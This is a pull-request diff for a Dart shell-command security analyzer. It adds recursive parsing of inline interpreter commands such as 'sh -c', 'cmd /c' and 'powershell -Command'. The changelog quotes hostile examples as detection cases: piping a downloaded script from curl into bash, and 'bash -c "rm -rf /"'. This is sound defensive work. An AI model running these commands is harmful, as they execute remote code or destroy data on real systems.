Skip to content
Merged
Show file tree
Hide file tree
Changes from all commits
Commits
File filter

Filter by extension

Filter by extension


Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
37 changes: 37 additions & 0 deletions CHANGELOG.md
Original file line number Diff line number Diff line change
@@ -1,3 +1,40 @@
## 1.1.0

### Tests

- Added parser coverage for commands that combine `|` with `&&`/`||`, asserting
the full AST structure: pipelines bind tighter than chain operators, runs of
the same chain operator flatten, and different operators nest left-to-right
(e.g. `a | b && c | d`, `a | b && c || d`, `curl … | bash && echo done`).
- Added `CommandSyntax.generic` coverage confirming operators are left
uninterpreted — `|`, `&&` and `||` survive as literal argument tokens on a
single flat invocation rather than producing `Pipeline`/`CommandChain` nodes.
- Added inline sub-command parser coverage for PowerShell and Windows CMD —
previously only POSIX `sh -c "…"` was tested. `powershell -Command "…"` and
`cmd /c|/k …` now assert the re-parsed `inlineCommand` AST (incl. inner
pipelines), `walk()` reaching nested invocations, depth bounding, the `pwsh`
alias, `/c` case-insensitivity, and that `-EncodedCommand`/`-enc` stay
un-recursed.

### Added

- Recursive analysis of inline interpreter sub-commands.

- Inline-execution sub-commands are now parsed into a nested AST and analyzed
recursively. A command string passed to an interpreter via an inline flag —
`sh -c "..."`, `bash -c '...'` (and other POSIX shells), `cmd /c ...`,
`powershell -Command "..."` — is re-parsed by the relevant parser and exposed
on the new `CommandInvocation.inlineCommand` AST field. Because it is a child
node, `walk()` descends into it, so every capability/effect/security detector
and policy sees the inner command exactly as if it were run directly.
- `sh -c "curl https://x/i.sh | bash"` now yields the same `critical → DENY`
verdict as the bare `curl https://x/i.sh | bash`.
- Catches forms the previous regex fallback missed, including single-quoted
scripts and non-remote-exec payloads (e.g. `bash -c "rm -rf /"`).
- Nesting is bounded (depth limit) to guard against pathological inputs.
- PowerShell `-EncodedCommand` is intentionally not recursed (base64, not
parseable) and remains `critical`.

## 1.0.1

Plugin-based command knowledge base.
Expand Down
17 changes: 15 additions & 2 deletions lib/src/ast/command_node.dart
Original file line number Diff line number Diff line change
Expand Up @@ -71,6 +71,7 @@ final class CommandInvocation extends CommandNode {
this.redirections = const <RedirectionNode>[],
this.substitutions = const <CommandSubstitution>[],
this.environmentReferences = const <EnvironmentVariableReference>[],
this.inlineCommand,
});

/// The program being invoked, exactly as written (not normalized).
Expand All @@ -88,6 +89,14 @@ final class CommandInvocation extends CommandNode {
/// Environment-variable references that appeared within this invocation.
final List<EnvironmentVariableReference> environmentReferences;

/// The command parsed from an inline-execution argument, if this invocation
/// runs an interpreter on a command string — e.g. the `curl ... | bash` of
/// `sh -c "curl ... | bash"`, or `cmd /c ...`, `powershell -Command ...`.
///
/// `null` for ordinary invocations. Being a child node, it is visited by
/// [walk], so the nested command is analyzed like any other command.
final CommandNode? inlineCommand;

/// All tokens of the invocation: [executable] followed by [arguments].
List<String> get tokens => <String>[executable, ...arguments];

Expand All @@ -96,6 +105,7 @@ final class CommandInvocation extends CommandNode {
...redirections,
...substitutions,
...environmentReferences,
?inlineCommand,
];

@override
Expand All @@ -105,7 +115,8 @@ final class CommandInvocation extends CommandNode {
_listEquals(other.arguments, arguments) &&
_listEquals(other.redirections, redirections) &&
_listEquals(other.substitutions, substitutions) &&
_listEquals(other.environmentReferences, environmentReferences);
_listEquals(other.environmentReferences, environmentReferences) &&
other.inlineCommand == inlineCommand;

@override
int get hashCode => Object.hash(
Expand All @@ -114,14 +125,16 @@ final class CommandInvocation extends CommandNode {
Object.hashAll(redirections),
Object.hashAll(substitutions),
Object.hashAll(environmentReferences),
inlineCommand,
);

@override
String toString() =>
'CommandInvocation($executable, args: $arguments'
'${redirections.isEmpty ? '' : ', redirs: $redirections'}'
'${substitutions.isEmpty ? '' : ', subs: $substitutions'}'
'${environmentReferences.isEmpty ? '' : ', env: $environmentReferences'})';
'${environmentReferences.isEmpty ? '' : ', env: $environmentReferences'}'
'${inlineCommand == null ? '' : ', inline: $inlineCommand'})';
}

/// A pipeline of commands connected by `|`, where each command's standard
Expand Down
99 changes: 99 additions & 0 deletions lib/src/parser/inline_exec.dart
Original file line number Diff line number Diff line change
@@ -0,0 +1,99 @@
/// Recognises interpreter invocations that run a command string supplied
/// inline as an argument — `bash -c "..."`, `sh -c '...'`, `cmd /c ...`,
/// `powershell -Command "..."` — so parsers can re-parse that string into a
/// nested AST and have it analyzed like any other command.
///
/// Shared by the shell, Windows CMD and PowerShell parsers to keep the
/// flag-recognition rules in one place.
library;

/// POSIX-family shells that take a script via `-c`/`--command`.
const Set<String> _posixShells = <String>{
'sh',
'bash',
'zsh',
'dash',
'ksh',
'fish',
'csh',
'tcsh',
};

/// PowerShell-family interpreters that take a script via `-Command`.
const Set<String> _powerShells = <String>{'powershell', 'pwsh'};

/// PowerShell encoded-command flag forms, which carry base64 (not parseable
/// source) and so are deliberately left un-recursed.
const Set<String> _encodedForms = <String>{
'-e',
'-ec',
'-enc',
'-encodedcommand',
};

/// The lowercase base name of [executable], with any directory prefix and a
/// trailing `.exe` removed (e.g. `/usr/bin/bash` and `BASH.EXE` → `bash`).
String inlineExecBasename(String executable) {
var name = executable;
final slash = name.lastIndexOf(RegExp(r'[\\/]'));
if (slash >= 0) name = name.substring(slash + 1);
name = name.toLowerCase();
if (name.endsWith('.exe')) name = name.substring(0, name.length - 4);
return name;
}

/// Returns the index into [arguments] of the argument holding the inline
/// command string for an [executable] invocation, or `null` when this is not
/// an inline-execution invocation (so nothing should be re-parsed).
///
/// Recognises POSIX `-c`/`--command` (including bundled short flags ending in
/// `c`, e.g. `-ec`), Windows `cmd /c`/`/k`, and PowerShell `-Command`. The
/// PowerShell `-EncodedCommand` family is intentionally excluded.
int? inlineScriptArgIndex(String executable, List<String> arguments) {
final exe = inlineExecBasename(executable);

if (_posixShells.contains(exe)) {
return _argAfter(arguments, _isPosixCommandFlag);
}
if (exe == 'cmd') {
return _argAfter(arguments, (a) {
final l = a.toLowerCase();
return l == '/c' || l == '/k';
});
}
if (_powerShells.contains(exe)) {
return _argAfter(arguments, (a) {
final l = a.toLowerCase();
if (_encodedForms.contains(l) || l.startsWith('-encoded')) return false;
// Mirrors ShellExecutionDetector: `-Command` and its `-c…` abbreviations.
return l == '-command' || l.startsWith('-c');
});
}
return null;
}

/// `-c`, `--command`, or a bundled short-option group ending in `c`
/// (`-ec`, `-xc`, ...) — but not long options like `--config`.
bool _isPosixCommandFlag(String a) {
if (a == '-c' || a == '--command') return true;
if (a.length >= 2 &&
a[0] == '-' &&
a[1] != '-' &&
a.endsWith('c') &&
RegExp(r'^-[a-z]+$').hasMatch(a)) {
return true;
}
return false;
}

/// The index immediately following the first argument matching [isFlag], when
/// such an argument exists and is followed by another argument.
int? _argAfter(List<String> arguments, bool Function(String) isFlag) {
for (var i = 0; i < arguments.length; i++) {
if (isFlag(arguments[i])) {
final next = i + 1;
return next < arguments.length ? next : null;
}
}
return null;
}
33 changes: 28 additions & 5 deletions lib/src/parser/powershell_parser.dart
Original file line number Diff line number Diff line change
@@ -1,9 +1,13 @@
import '../ast/command_node.dart';
import '../syntax.dart';
import 'command_parser.dart';
import 'inline_exec.dart';
import 'parse_diagnostic.dart';
import 'parse_result.dart';

/// The maximum interpreter-nesting depth re-parsed for inline `-Command` args.
const int _maxInlineDepth = 5;

/// Parser for Microsoft PowerShell.
///
/// Recognises pipelines (`|`), statement separators (`;`), the `&&`/`||`
Expand All @@ -21,7 +25,7 @@ final class PowerShellParser extends CommandParser {
ParseResult parse(String raw) {
final diagnostics = <ParseDiagnostic>[];
final tokens = _PsTokenizer(raw, diagnostics).tokenize();
final ast = _PsTokenParser(tokens, diagnostics).parse();
final ast = _PsTokenParser(tokens, diagnostics, depth: 0).parse();
if (ast == null) {
diagnostics.add(const ParseDiagnostic.info('Empty command'));
}
Expand Down Expand Up @@ -296,18 +300,21 @@ class _PsTokenizer {
void _addSub(String inner, List<CommandSubstitution> subs) {
final innerDiag = <ParseDiagnostic>[];
final tokens = _PsTokenizer(inner, innerDiag).tokenize();
final node = _PsTokenParser(tokens, innerDiag).parse();
final node = _PsTokenParser(tokens, innerDiag, depth: 0).parse();
subs.add(
CommandSubstitution(node ?? const CommandInvocation(executable: '')),
);
}
}

class _PsTokenParser {
_PsTokenParser(this.tokens, this.diagnostics);
_PsTokenParser(this.tokens, this.diagnostics, {required this.depth});

final List<_PsToken> tokens;
final List<ParseDiagnostic> diagnostics;

/// How many interpreter `-Command` boundaries deep this parser is nested.
final int depth;
int _i = 0;

bool get _atEnd => _i >= tokens.length;
Expand Down Expand Up @@ -418,12 +425,28 @@ class _PsTokenParser {
break;
}
if (words.isEmpty) return null;
final executable = words.first.value;
final arguments = words.skip(1).map((t) => t.value).toList(growable: false);
return CommandInvocation(
executable: words.first.value,
arguments: words.skip(1).map((t) => t.value).toList(growable: false),
executable: executable,
arguments: arguments,
redirections: redirections,
substitutions: subs,
environmentReferences: envs,
inlineCommand: _parseInlineCommand(executable, arguments),
);
}

/// Re-parses the inline command string of `powershell -Command "..."` into a
/// nested AST. `-EncodedCommand` is excluded by [inlineScriptArgIndex].
CommandNode? _parseInlineCommand(String executable, List<String> arguments) {
if (depth >= _maxInlineDepth) return null;
final index = inlineScriptArgIndex(executable, arguments);
if (index == null) return null;
final script = arguments[index];
if (script.isEmpty) return null;
final innerDiag = <ParseDiagnostic>[];
final innerTokens = _PsTokenizer(script, innerDiag).tokenize();
return _PsTokenParser(innerTokens, innerDiag, depth: depth + 1).parse();
}
}
39 changes: 34 additions & 5 deletions lib/src/parser/shell_parser.dart
Original file line number Diff line number Diff line change
@@ -1,9 +1,14 @@
import '../ast/command_node.dart';
import '../syntax.dart';
import 'command_parser.dart';
import 'inline_exec.dart';
import 'parse_diagnostic.dart';
import 'parse_result.dart';

/// The maximum interpreter-nesting depth re-parsed for inline `-c` arguments,
/// guarding against pathological inputs like `bash -c "bash -c \"...\""`.
const int _maxInlineDepth = 5;

/// Shared implementation for POSIX/Bash-family shells.
///
/// Recognises pipelines (`|`), command chaining (`;`, `&&`, `||`), I/O
Expand All @@ -23,7 +28,7 @@ abstract base class ShellParser extends CommandParser {
final diagnostics = <ParseDiagnostic>[];
final tokenizer = _ShellTokenizer(raw, diagnostics);
final tokens = tokenizer.tokenize();
final parser = _TokenParser(tokens, diagnostics);
final parser = _TokenParser(tokens, diagnostics, depth: 0);
final ast = parser.parseScript();
if (ast == null) {
diagnostics.add(const ParseDiagnostic.info('Empty command'));
Expand Down Expand Up @@ -434,7 +439,7 @@ class _ShellTokenizer {
void _addSubstitution(String inner, List<CommandSubstitution> subs) {
final innerDiagnostics = <ParseDiagnostic>[];
final tokens = _ShellTokenizer(inner, innerDiagnostics).tokenize();
final node = _TokenParser(tokens, innerDiagnostics).parseScript();
final node = _TokenParser(tokens, innerDiagnostics, depth: 0).parseScript();
subs.add(
CommandSubstitution(node ?? const CommandInvocation(executable: '')),
);
Expand All @@ -444,10 +449,13 @@ class _ShellTokenizer {
// --- Recursive-descent parser over tokens --------------------------------

class _TokenParser {
_TokenParser(this.tokens, this.diagnostics);
_TokenParser(this.tokens, this.diagnostics, {required this.depth});

final List<_Token> tokens;
final List<ParseDiagnostic> diagnostics;

/// How many interpreter `-c` boundaries deep this parser is nested.
final int depth;
int _i = 0;

bool get _atEnd => _i >= tokens.length;
Expand Down Expand Up @@ -593,12 +601,33 @@ class _TokenParser {
);
}

final executable = words.first.value;
final arguments = words.skip(1).map((t) => t.value).toList(growable: false);
return CommandInvocation(
executable: words.first.value,
arguments: words.skip(1).map((t) => t.value).toList(growable: false),
executable: executable,
arguments: arguments,
redirections: redirections,
substitutions: subs,
environmentReferences: envs,
inlineCommand: _parseInlineCommand(executable, arguments),
);
}

/// Re-parses the inline command string of `sh -c "..."`/`bash -c '...'` into
/// a nested AST, or returns `null` when this is not an inline-exec call (or
/// the nesting limit is reached).
CommandNode? _parseInlineCommand(String executable, List<String> arguments) {
if (depth >= _maxInlineDepth) return null;
final index = inlineScriptArgIndex(executable, arguments);
if (index == null) return null;
final script = arguments[index];
if (script.isEmpty) return null;
final innerDiagnostics = <ParseDiagnostic>[];
final innerTokens = _ShellTokenizer(script, innerDiagnostics).tokenize();
return _TokenParser(
innerTokens,
innerDiagnostics,
depth: depth + 1,
).parseScript();
}
}
Loading